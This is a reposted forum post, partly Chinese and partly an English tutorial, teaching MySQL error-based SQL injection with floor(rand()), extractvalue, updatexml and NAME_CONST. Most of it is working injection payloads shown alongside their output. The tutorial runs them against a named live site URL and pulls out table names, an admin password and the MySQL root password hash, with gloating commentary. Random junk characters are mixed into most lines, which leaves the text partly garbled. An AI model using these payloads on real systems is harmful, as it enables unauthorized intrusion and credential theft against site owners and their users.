|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:2 x" O0 i- G- H/ c
首先进行正常查询: mysql> select * from article where id = 1;
/ N- E L) A9 z4 o* e3 E+—-+——-+———+
& m7 z) N b: Y- s2 m| id | title | content |
" n* T7 l3 J5 @8 s9 P. O+—-+——-+———+* m% u8 q0 ]+ _( ~ h& g( O
| 1 | test | do it |1 k; @6 K3 N2 I |. W2 g
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);! \& F# F. m+ X3 u) B. g
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
# o( {6 T o9 `% K: {' B例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( [2 p& O1 Q3 b. B. j* wERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));* | h; w0 C: ]" h3 L) ]
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue- g: C5 L% K9 ]- G+ G- _# v! U
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
9 D4 G! d; ]- j% P0 dERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
8 m+ i" o! ~: ? x$ H/ O4 N) q0 o
- {9 q. F* j {# `' Y. m7 Z再收集: ) V6 n e% O1 a% C7 X
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
/ J) {' r9 L3 X' e6 c; ^; ]) g, I1 w! M3 H/ T/ C( S- q8 V
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
. j$ y+ K0 q% h/ |+ ^. }' x2 H
' I7 Z: r% ^" ^+ \http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)( @2 ]" t N* b/ K. r
8 Z. q+ g% }# K s! C2 e! _
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ : @/ K* U! w& g& Z3 f' `. ?: s
3 ]( I5 e$ Y2 s1 f: }3 K) v* ^; HMYSQL高版本报错注入技巧-利用NAME_CONST注入$ N5 M) k. ?/ E
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 5 t; Z w+ A0 Q8 A" D
, A6 k3 W1 f1 K
' h/ r8 L. S" X& @3 o' {
相关信息0 \# I, h1 N0 K
2 c7 F7 v3 o' M4 ~6 b
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
$ U( j' F( N; L* |/ x, ~8 H& }
Code:1 g: Q3 c* R1 x. h
NAME_CONST(DATA, VALUE)! ?* I! N- v' q k' J! s
5 C4 `6 D" d- ]: `
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
: G% C6 f8 {) l; z" b4 a4 C
' G q7 t8 ?7 t: C" K- V0 ASELECT NAME_CONST('TEST', 1)
- }# _, ]* y ?6 K# y/ ?/ F
; r# L$ o; y `+ S) B& m$ a" K& m% O- L# b7 n/ z4 r
4 H" z" F, M4 y3 o
|---------------|
' e9 \: r' z; u0 N| TEST |
. q& v7 t" Y* ?( v/ \( m| |
5 A$ c- v0 o R9 I; e7 B b4 a|---------------|
8 x# o. l! l2 {8 l| 1 |4 Y3 ?! }3 |* T" u o1 v4 Q7 a) L
| |. s1 K% T' _, V! L: O" w
|---------------|
m0 u! i5 q" X( \ s1 e9 x, \9 r4 n! e
; E! o1 I% G% }: _6 `+ \+ h
! A% e, G% @1 w; L. v4 L
9 G X' `. j/ [7 B, ^0 w: S- Whttp://dev.mysql.com/doc/refman/5.0/en/m...name-const# d: w8 X' `/ y5 t$ s' \; I- {
Intro to MySQL Variables3 v. M8 l2 U% M6 ]3 F$ y5 J
: {3 L) T9 A3 H- M
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.2 ~/ N) e1 Z* g; j, o9 r* I7 `
7 s/ m' ~0 @4 n6 LCode:
g& V: M# u9 O# Ahttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2617 a* ~; {3 T- u8 q$ y; l7 l
/ ~6 u8 _" N4 Z. d
& ]) s0 `( ]) ^1 ~5 h) T8 N2 B9 Z
- }, c/ J9 G. K* j$ g
2 d7 u* Y. ]" I, A7 Z& RCode:) q1 v) D0 I" o$ r( F& K. h
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--: _! }+ r8 k$ h
* E3 i1 U7 S9 F' H8 U }9 \
. h/ m* u/ S" t# c! kVAR = Your MySQL variable., [4 A/ L N2 m Q
; ?# r8 N" U$ o# a
MySQL 5.1.3 Server System Variables/ W, ~: i1 b: d
, |% N& M6 d( w5 N9 P2 NLet's try it out on my site..( v' |/ a2 H1 m L5 U
, y% A7 w8 Z4 \" n) QCode:) J5 t' {# V2 j6 Z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
# R0 s% z" u. s" d6 c' h$ D! A, S6 z
Erroruplicate column name '5.0.27-community-nt'
$ d5 E" E6 B3 u$ ]
, X2 A; @9 K1 ~
9 o, h( y- ^3 W
0 G, [" T7 @# ~/ H! z. Q
: Q/ m6 z" d' g
7 @$ e2 \6 X: Y& A$ TNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
9 s3 r7 r' R: }% ?* r/ p( T& f
+ c g5 e" Y# W* t4 nData Extraction
8 N5 g; G% Z" C% M; J- |, K( R+ P' }# L& U1 e
Code:- Z3 O9 _; Y3 l8 x. v; x- x9 w
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
4 j: K; m1 d( D" g+ X& v
* }$ n! y" [/ G' j- x7 G
* S: [; x4 D! I+ @* ^We should get a duplicate column 1 error...
1 Z+ s3 {8 \# e" J0 f' V) Z
4 l: o8 M. Q/ t2 m2 p; m' E9 aCode:5 ]% z- Q! [# H
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--, h5 ~2 \% h) ^& _' B/ ~
i; E9 n7 x; V; B1 A& T& c$ SErroruplicate column name '1+ a5 v- [: l) \) g7 R$ _
1 E. P% Z) ~) R5 F. j* z
, m# g4 j$ e y* q( _( t3 x Z! k
* q6 W8 d( K4 c g! E' K" s/ M" y7 p: z! ~; C4 W
7 X! o* P9 }6 n9 R" w' M8 Q
L4 u# E C; L& C7 ^7 A! ^Now let's get the tables out this bitch..1 t1 f2 q1 e3 P O
6 \- N7 m# w+ n5 b% }: i& W
Code:) I' V# S3 |0 L
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* y# y5 `( X/ k4 B# u9 Z
/ T* H( }& v0 C3 E2 A: b- ?' n
, [+ O1 S! d* B" M KLet's see if it works here, if it does, we can go on and finish the job.2 L- @0 ?0 z3 S
* P# i5 H5 ]# {5 t$ g
Code:% ?& W7 [5 D6 f) O9 M* S* z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--1 ]6 U& e( X- \
: F4 ?5 M; y/ g% Z# ?
' ^, s* g, _" f( w- Y3 s) i
Erroruplicate column name 'com_admanage
* N# v; J o3 P) @9 j
5 J- k. K& K1 [" S
8 e# }7 o# W% d. h7 W3 `9 G. Q: m6 z. @* c) M7 e& r" \2 F
( H7 D5 ?9 D- M: K7 _' r; J% L: n+ }
. C K* _; i% S z! z) K& D5 e: F/ Y% hNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.; ]) p! g; j( H) t
3 H6 N; P( z; O2 E! r& Z0 D O- q8 Z8 jLet's get the columns out of the user table..! t& C' R, f2 V3 x& ]
v+ }* U7 P; }# `. Q0 A! ACode:
0 [8 p. P3 h: S% H5 @2 A; y+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--" M. q3 f) C5 l& w7 q( f) U
( [" G" s7 j2 u1 j5 W
/ M" r, L4 F6 i2 h9 z6 lSo mine looks like this, and I get the duplicate column name 'Host'.
$ T: H3 ?; V; P' r# J1 P7 S. q
. E8 d/ o* n D, ]' H6 v& [- SCode:
" D* q/ k' u; H5 s9 ]http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
6 A* f/ j" E+ \3 M9 u% N9 [( b. P
6 o9 e! N. s; m! p4 NErroruplicate column name 'Host'
, A* w& c. w. q G( b6 l( w7 q7 X1 I* B8 H# m9 D5 i
- X- I1 `# \9 z9 ~% p. P2 ^8 u8 X7 T- `9 l, J- L; O
1 `( o+ @5 [& i: F+ p& C/ b( M& e+ J; V
' A. D3 @/ n$ ^8 v/ eWoot, time to finish this bitch off.
! b, e- z8 x4 \( X! x) ]6 W6 M4 _7 c7 q3 g
Code:
# c8 S' ]( b) R+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
4 J- V( D* ]/ U0 m9 B% B; z
; H1 I# V1 F7 q" i# T) e* {: k, s% k) v
So mine looks like this...
+ t2 Y6 j L/ D* O7 V
% t( x; k4 f) @5 z5 [! eCode:
& W/ V. c5 ?% |2 X) ]/ r' N" N& B' T1 n6 qhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
6 y; ^ N# N; Y7 }
. n& S4 q4 t, t1 WErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
. h6 g/ Q8 t9 C( J/ i( [0 h, z" Z7 \+ h2 Z
9 u% ]1 G! b; y8 p
, |) e' B, x# \1 A: o. r# h ` R7 l" i0 ~
, M( L6 M0 _5 c/ ~1 L: }
$ E# [, u; _- x, ~; I/ k% CAnd there we have it, thanks for reading.
6 A3 _9 A% Q; Y" A! m2 |5 d2 I, d0 Z; }$ F+ s9 W1 W5 C
|
发表于 2015-11-11 19:03:37
收藏
支持
反对